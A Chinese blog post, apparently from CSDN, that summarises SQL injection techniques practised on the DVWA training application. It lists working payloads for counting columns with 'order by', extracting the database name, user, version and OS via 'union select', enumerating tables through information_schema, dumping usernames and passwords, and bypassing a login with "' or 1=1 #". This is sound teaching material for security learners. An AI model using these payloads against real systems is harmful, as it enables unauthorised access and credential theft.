SQL注入总结

最新推荐文章于 2024-11-14 15:58:00 发布
最新推荐文章于 2024-11-14 15:58:00 发布
阅读量453 收藏 6
点赞数 11
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79879962/article/details/135916409
版权
本文详细介绍了SQL注入的基本概念,通过实例展示了如何利用SQL注入技巧猜解数据库信息,包括数据库名称、版本、表名和用户密码,并演示了如何通过构造SQL语句绕过登录验证。
摘要由CSDN通过智能技术生成

SQL注入

一.  Sql注入入门知识点总结

  1. 猜解数据库

1)     设想这样的一个场景当我们要输入一个用户id,我们输入栏中输入1

这时候其实在后台执行的代码为

SELECT first_name, last_name FROM users WHERE user_id = '1';

2)     如果我们不按常理出牌而是在输入框中输入1‘ order by 1#

那么这时候后台执行的代码就变成了:

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1 #‘(按照sql的语法#起注释作用所以#后面的单引号就被注释掉了)

当我们输入order by 1的时候可能不会报错那么我们这时候可以尝试 23456,直到报错为止

假如当数字等于3的时候报错,那说明当前表只有两个字段并且只有2列

  1. 接下来使用union select 联合查询继续获取信息

Union select运算符可以将两个或者两个以上的select语句查询结果集合合并成一个结果集合显示,即执行联合查询需要注意的是使用union查询的时候需要和主查询的列数相等,而且我们之前已经知道主查询的列数是2,接下来就好办了

1)     这时候我们输入1‘ union select database(),user()#进行查询

  Database()将会返回当前网站所使用的数据库名字

  User()将会返回执行当前查询的用户名

实际执行的sql语句是:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user() #;

通过查询的结果我们可以看出

  当前执行查询用户名为root@localhost

  当前使用的数据库是dvwa

2)     接下来我们尝试获取输入1' union select version(),@@version_compile_os#进行查询

  version() 获取当前数据库版本.

  @@version_compile_os 获取当前操作系统

实际执行的sql语句是 :

SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;

通过查询的结果我们可以清晰的看出

  当前执行查询用户名为root@localhost

  当前使用的数据库是dvwa

2)     接下来我们尝试获取输入1' union select version(),@@version_compile_os#进行查询

  version() 获取当前数据库版本.

  @@version_compile_os 获取当前操作系统

实际执行的sql语句是 :

SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;

b的版本以及操作系统的类型

  当前数据库版本为 : 5.6.31-0ubuntu0.15.10.1.

  当前操作系统为 : debian-linux-gnu

3)     接下来我们尝试获取dvwa数据库中表名

information_schema 是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

       我们输入1‘ union select table_names,table_schema from information_schema.tables where table_schema = ‘dvwa’ #

       实际执行的的sql语句是:

       SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`;

通过查询的结果我们可以清晰的看出

l  Dvwa数据库有两个数据表,分别是guestbook,和users

4)     接下来我们尝试获取重量级用户名和密码

由经验我们可以大胆猜测users数据表里面的字段是user 和password所以输入:

1’ union select user,password from users #

实际执行的的sql语句是:

SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;

通过查询的结果我们可以清晰的看出

用户名以及密码

二.  Sql注入实验二验证绕过

  1. 怎么做能绕过登陆页面呢?

我们可以尝试输入 123 ‘ or 1=1 123 ‘ or 1=1

下面我们就来分析一下

实际执行的的sql语句是:

select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'

按照mysql的语法#后面的东西会被忽略掉所以即便我们即便输入 ‘ or 1=1 #(密码栏不输入东西结果也是一样的)

由于判断语句 or 1=1 恒成立所以不管前面输入的什么都能成功登陆

我们不在尝试使用#屏蔽单引号,采用手动闭合式

123‘ or ‘1’ =’1 这样同样能登陆成功

緣黺
关注
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
有效防止SQL注入的5种方法总结
09-09
SQL注入是一种严重的网络安全威胁,它利用开发者在编程时未充分考虑输入验证的漏洞,通过构造恶意的SQL语句,攻击者可以绕过权限控制,获取敏感数据,甚至篡改数据库内容。以下是对防止SQL注入的五种方法的详细说明...
sql注入总结
weixin_51692662的博客
08-16 892
sql注入,web安全,数据库
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 8283
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
CTF-SQL注入总结
SWC0619的博客
03-11 8362
SQL注入总结(一)
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 22万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL 注入总结
wkend的博客
10-10 3036
0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 GET注入 POST注入 Cookie注入 按注入方式分 报错注入 盲注 布尔盲注 时间盲注 union注入 编码问题 宽字节注入 0x03识别后台数据库 1. 根据操作...
Sql注入总结
weixin_40709439的博客
05-12 2072
Sql注入总结 联合查询: 1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入 2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜测字段 ,?id=1’ order by 3%23 4、找到页面中数据输入点, ?id=-1’ union select 1,2,3%23 5、查数据库,?id=1’ union ...
【CTF】SQL 注入 总结
algae
08-15 1028
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
DVWA SQL注入总结
iO快到碗里来
05-13 1195
DVWA SQL Injection 1.判断是否存在漏洞 输入1提交-回显用户信息 输入1‘提交-服务器报错:数据库为Mysql 2.判断POC方式 输入 1‘ or ‘1’=’1 回显所有用户信息 在这里我们可以使用union注入 查询字段数 1‘ order by 1-- ;1’ order by 10-- ;…(二分法) 最后确定为2 确定回显点 -1‘ union select 1,2 -- ; 最后确定为2 查询用户名和数据库名 -1’ union select user(),dat
SQL注入学习总结
YouthBelief的博客
10-09 4723
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
[HACK学习呀] - 2019-11-11 科普基础 - 这可能是最全的SQL注入总结,不来看看吗1
08-03
1.MySQL5.0以下没有information_schema这个默认数据库 2.ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名 3.MySQ
MySQL 8.0特性-自增变量的持久化
myneth的博客
11-13 328
在MySQL 8.0之前,自增主键AUTO_INCREMENT的值如果大于max(primary key)+1,在MySQL重启后,会重置AUTO_INCREMENT=max(primary key)+1,这种现象在某些情况下会导致业务主键冲突或者其他难以发现的问题。下面通过案例来对比不同的版本中自增变量是否持久化。
随堂测微信小程序ssm+论文源码调试讲解
u014445459的博客
11-11 978
微信小程序,简称小程序,英文名Mini Program,是一种全新的连接用户与服务的方式,可以快速访问、快速传播,并具有良好的使用体验。小程序的主要开发语言是JavaScript,它与普通web的开发有很多相似之处。小程序和普通网页开发并不是相同的东西,是有差异的。网页开发的渲染线程和脚本线程是互斥的,而在小程序中,确实分开的,分别在不同的线程之中运行。
[Docker#9] 存储卷 | Volume、Bind、Tmpfs | -v/mount | MySQL 灾难恢复 | 问题
最新发布
2301_80171004的博客
11-14 450
本文介绍了 Docker 存储卷的概念、分类及其应用。从什么是存储卷、生活案例到存储卷的必要性,再到管理卷、绑定卷和临时卷的具体创建与使用方法,最后通过 MySQL 灾难恢复的实战案例,帮助读者全面掌握存储卷的运用技巧。
数据库和云服务器哪个便宜一些?
petaexpress的博客
11-12 397
云服务器的价格区间相对更广泛,因为用户可以根据实际需求选择不同配置和性能的服务器。而云数据库的价格则更多地依赖于数据库类型和规格。在相同配置下,云服务器的价格可能会略低于云数据库,但这并不是绝对的,因为两者都有不同的优惠政策和计费方式。
约束(MYSQL)
2301_80363309的博客
11-13 240
not null(非空) unique(唯一) default(默认约束,规定值) 主键约束primary key(非空且唯一) auto_increment(自增类型) 复合主键 check(保证列中值符合指定条件) foreign key(外键约束)
XSS与SQL注入攻防详解
"XSS & SQL注入" ...总结,了解XSS和SQL注入的原理及防护策略是每个Web开发者和网络安全专业人员的基础知识。确保代码的安全性和应用最佳实践,可以有效防止这些常见攻击,保护用户数据的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值